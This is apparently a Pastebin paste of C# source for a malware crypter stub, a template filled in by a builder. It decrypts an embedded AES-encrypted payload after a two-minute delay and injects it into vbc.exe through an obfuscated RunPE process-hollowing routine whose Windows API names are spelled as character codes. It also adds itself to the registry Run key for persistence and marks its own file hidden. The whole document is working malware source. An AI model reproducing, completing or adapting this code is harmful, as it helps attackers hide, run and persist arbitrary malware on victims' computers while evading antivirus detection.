SHARE
TWEET

Untitled

a guest Sep 19th, 2019 85 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Data;
  4. using System.Drawing;
  5. using System.Threading;
  6. using System.Text;
  7. using System.Windows.Forms;
  8. using System.IO;
  9. using System.Runtime.InteropServices;
  10. using System.Resources;
  11. using System.Security.Cryptography;
  12. using System.Reflection;
  13. using Microsoft.Win32;
  14.  
  15. static class Program
  16. {
  17.     [STAThread]
  18.     static void Main()
  19.     {
  20.         Application.EnableVisualStyles();
  21.         Application.SetCompatibleTextRenderingDefault(false);
  22.         Application.Run(new frmOne());
  23.     }
  24. }
  25.  
  26. class Reader
  27. {
  28.     [DllImport("kernel32.dll")]
  29.     static extern IntPtr GetModuleHandle(string module);
  30.     [DllImport( "kernel32.dll", SetLastError=true )]
  31.     static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
  32.     [DllImport("kernel32.dll", SetLastError=true)]
  33.     static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
  34.     [DllImport("kernel32.dll", SetLastError=true)]
  35.     static extern uint SizeofResource(IntPtr hModule, IntPtr hResInfo);
  36.  
  37.     public static byte[] ReadNative()
  38.     {
  39.         // Get the handle of the resource from the defined file.
  40.         IntPtr hModule = GetModuleHandle(Assembly.GetExecutingAssembly().Location);
  41.         // Locates the resource using its name and type.
  42.         IntPtr loc = FindResource(hModule, "Encrypted", "RT_RCDATA");
  43.         // Loads the resource into a pointer to it.
  44.         IntPtr x = LoadResource(hModule, loc);
  45.         // Gets the size of the resource.
  46.         uint size = SizeofResource(hModule, loc);
  47.         // We declare a byte array with the size of the resource,
  48.         // to store the read bytes there.
  49.         byte[] ret = new byte[size];
  50.         // Copies the contents of the resource to the byte array
  51.         // from memory.
  52.         Marshal.Copy(x, ret, 0, (int)size);
  53.         // Returns the resource's byte array aka the encrypted file bytes.
  54.         return ret;
  55.     }
  56.  
  57.     public static byte[] ReadManaged()
  58.     {
  59.         // We declare a new resource manager and we want it to manage the "Encrypted" resource.
  60.         ResourceManager Manager = new ResourceManager("Encrypted", Assembly.GetExecutingAssembly());
  61.         // We retrieve the resource as an object and we cast it to a byte array since it's
  62.         // a byte array.
  63.         byte[] bytes = (byte[])Manager.GetObject("encfile");
  64.         // We return the resource's byte array, aka the encrypted file bytes.
  65.         return bytes;
  66.     }
  67. }
  68.  
  69. public partial class frmOne : Form
  70. {
  71.  
  72.     // This is needed so the form could initialize, be hidden from taskbar
  73.     // and also invisible.
  74.     private void InitializeComponent()
  75.     {
  76.         this.SuspendLayout();
  77.         this.FormBorderStyle = FormBorderStyle.None;
  78.         this.ShowInTaskbar = false;
  79.         this.ResumeLayout(false);
  80.         this.Visible = false;
  81.         this.WindowState = FormWindowState.Minimized;
  82.     }
  83.    
  84.     // Variables that we need to control the execution.
  85.     // Storage declares the storage method we used.
  86.     string storage = "[storage-replace]";
  87.     // Startup declares if the stub should add itself to startup.
  88.     bool startup = [startup-replace];
  89.     // Hide declares if the stub should hide itself (the executable).
  90.     bool hide = [hide-replace];
  91.  
  92.     // We get the path of vbc.exe, the process we'll be injecting into.
  93.     string vbcPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe");
  94.  
  95.     public frmOne()
  96.     {
  97.         InitializeComponent();
  98.         // Declare a variable to store the encrypted file bytes.
  99.         byte[] filebytes = null;
  100.  
  101.         if (storage == "native")
  102.             // If the storage method was native resources,
  103.             // get the file bytes from native resources.
  104.             filebytes = Reader.ReadNative();
  105.         else
  106.             // If the storage method was managed resources,
  107.             // get the file bytes from managed resources.
  108.             filebytes = Reader.ReadManaged();
  109.  
  110.         // Decrypt the encrypted file bytes using the AES algorithm
  111.         // and the key the user generated on the builder.
  112.         filebytes = AESDecrypt(filebytes, "[key-replace]");
  113.  
  114.         // Inject the bytes to vbc.exe
  115.         IX.AA(filebytes, vbcPath);
  116.  
  117.         // Check if the user enabled startup.
  118.         // If he did, add the file to startup.
  119.         if (startup)
  120.             AddToStartup();
  121.  
  122.         // Check if the user enable hide file.
  123.         // If he did, hide the file from the file explorer.
  124.         if (hide)
  125.             HideFile();
  126.     }
  127.  
  128.  
  129.     // This is the AES decryption algorithm.
  130.     public static byte[] AESDecrypt(byte[] input, string Pass)
  131.     {
  132.         System.Security.Cryptography.RijndaelManaged AES = new System.Security.Cryptography.RijndaelManaged();
  133.         byte[] hash = new byte[32];
  134.         byte[] temp = new MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.ASCII.GetBytes(Pass));
  135.         Array.Copy(temp, 0, hash, 0, 16);
  136.         Array.Copy(temp, 0, hash, 15, 16);
  137.         AES.Key = hash;
  138.         AES.Mode = System.Security.Cryptography.CipherMode.ECB;
  139.         Thread.Sleep(120000);
  140.         System.Security.Cryptography.ICryptoTransform DESDecrypter = AES.CreateDecryptor();
  141.         return DESDecrypter.TransformFinalBlock(input, 0, input.Length);
  142.     }
  143.  
  144.     // This is the code to add the stub to startup.
  145.     public void AddToStartup()
  146.     {
  147.         RegistryKey Key = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
  148.         Key.SetValue("CryptedFile", Application.ExecutablePath);   
  149.     }
  150.  
  151.     // This is the code to hide the stub from the file explorer.
  152.     public void HideFile()
  153.     {
  154.         FileInfo Info = new FileInfo(Application.ExecutablePath);
  155.         Info.Attributes = FileAttributes.Hidden;       
  156.     }
  157. }
  158.  
  159.  
  160. // This is the RunPE class (the code we use to inject the bytes to the target process)
  161. // Credits to Oppresor for this class.
  162. public class IX
  163. {
  164.     [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  165.     internal static extern IntPtr LoadLibraryA([In, MarshalAs(UnmanagedType.LPStr)] string lpFileName);
  166.     [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
  167.     static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  168.     delegate bool ESS(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, byte[] sInfo, IntPtr[] pInfo);
  169.     delegate bool EXT(IntPtr hThr, uint[] ctxt);
  170.     delegate bool TEX(IntPtr t, uint[] c); //all kernel32
  171.     delegate uint ION(IntPtr hProc, IntPtr baseAddr); //ntdll
  172.     delegate bool ORY(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead);
  173.     delegate uint EAD(IntPtr hThread); //kernel32.dll
  174.     delegate IntPtr CEX(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot);
  175.     delegate bool CTEX(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect);
  176.     delegate bool MOR(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); //kernel32.dll
  177.     delegate bool OP(byte[] bytes, string surrogateProcess);
  178.  
  179.     public T CreateAPI<T>(string name, string method)
  180.     {
  181.         return (T)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), typeof(T));
  182.     }
  183.     public static bool AA(byte[] bytes, string surrogateProcess)
  184.     {
  185.         IX p = new IX();
  186.         OP F1 = new OP(p.R);
  187.         bool Res = F1(bytes, surrogateProcess);
  188.         return Res;
  189.     }
  190.     public bool R(byte[] bytes, string surrogateProcess)
  191.     {
  192.         String K32 = Convert.ToString((char)107) + (char)101 + (char)114 + (char)110 + (char)101 + (char)108 + (char)51 + (char)50;
  193.         String NTD = Convert.ToString((char)110) + (char)116 + (char)100 + (char)108 + (char)108;
  194.         ESS CP = CreateAPI<ESS>(K32, Convert.ToString((char)67) + (char)114 + (char)101 + (char)97 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)65);
  195.         ION NUVS = CreateAPI<ION>(NTD, Convert.ToString((char)78) + (char)116 + (char)85 + (char)110 + (char)109 + (char)97 + (char)112 + (char)86 + (char)105 + (char)101 + (char)119 + (char)79 + (char)102 + (char)83 + (char)101 + (char)99 + (char)116 + (char)105 + (char)111 + (char)110);
  196.         EXT GTC = CreateAPI<EXT>(K32, Convert.ToString((char)71) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
  197.         TEX STC = CreateAPI<TEX>(K32, Convert.ToString((char)83) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
  198.         ORY RPM = CreateAPI<ORY>(K32, Convert.ToString((char)82) + (char)101 + (char)97 + (char)100 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
  199.         EAD RT = CreateAPI<EAD>(K32, Convert.ToString((char)82) + (char)101 + (char)115 + (char)117 + (char)109 + (char)101 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100);
  200.         CEX VAE = CreateAPI<CEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)65 + (char)108 + (char)108 + (char)111 + (char)99 + (char)69 + (char)120);
  201.         CTEX VPE = CreateAPI<CTEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)80 + (char)114 + (char)111 + (char)116 + (char)101 + (char)99 + (char)116 + (char)69 + (char)120);
  202.         MOR WPM = CreateAPI<MOR>(K32, Convert.ToString((char)87) + (char)114 + (char)105 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
  203.         try
  204.         {
  205.             IntPtr procAttr = IntPtr.Zero;
  206.             IntPtr[] processInfo = new IntPtr[4];
  207.             byte[] startupInfo = new byte[0x44];
  208.             int num2 = BitConverter.ToInt32(bytes, 60);
  209.             int num = BitConverter.ToInt16(bytes, num2 + 6);
  210.             IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54));
  211.             if (CP(null, new StringBuilder(surrogateProcess), procAttr, procAttr, false, 4, procAttr, null, startupInfo, processInfo))
  212.             {
  213.                 uint[] ctxt = new uint[0xb3];
  214.                 ctxt[0] = 0x10002;
  215.                 if (GTC(processInfo[1], ctxt))
  216.                 {
  217.                     IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L);
  218.                     IntPtr buffer = IntPtr.Zero;
  219.                     IntPtr bufferSize = new IntPtr(4);
  220.                     IntPtr numRead = IntPtr.Zero;
  221.                     if (RPM(processInfo[0], baseAddr, ref buffer, (int)bufferSize, ref numRead) && (NUVS(processInfo[0], buffer) == 0))
  222.                     {
  223.                         IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34));
  224.                         IntPtr size = new IntPtr(BitConverter.ToInt32(bytes, num2 + 80));
  225.                         IntPtr lpBaseAddress = VAE(processInfo[0], addr, size, 0x3000, 0x40);
  226.                         int lpNumberOfBytesWritten;
  227.                         WPM(processInfo[0], lpBaseAddress, bytes, (uint)((int)ptr4), out lpNumberOfBytesWritten);
  228.                         int num5 = num - 1;
  229.                         for (int i = 0; i <= num5; i++)
  230.                         {
  231.                             int[] dst = new int[10];
  232.                             Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), dst, 0, 40);
  233.                             byte[] buffer2 = new byte[(dst[4] - 1) + 1];
  234.                             Buffer.BlockCopy(bytes, dst[5], buffer2, Convert.ToInt32(null, 2), buffer2.Length);
  235.                             size = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
  236.                             addr = new IntPtr(buffer2.Length);
  237.                             WPM(processInfo[0], size, buffer2, (uint)addr, out lpNumberOfBytesWritten);
  238.                         }
  239.                         size = new IntPtr(ctxt[0x29] + 8L);
  240.                         addr = new IntPtr(4);
  241.                         WPM(processInfo[0], size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint)addr, out lpNumberOfBytesWritten);
  242.                         ctxt[0x2c] = (uint)(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40));
  243.                         STC(processInfo[1], ctxt);
  244.                     }
  245.                 }
  246.                 RT(processInfo[1]);
  247.             }
  248.         }
  249.         catch
  250.         {
  251.             return false;
  252.         }
  253.         return true;
  254.     }
  255. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top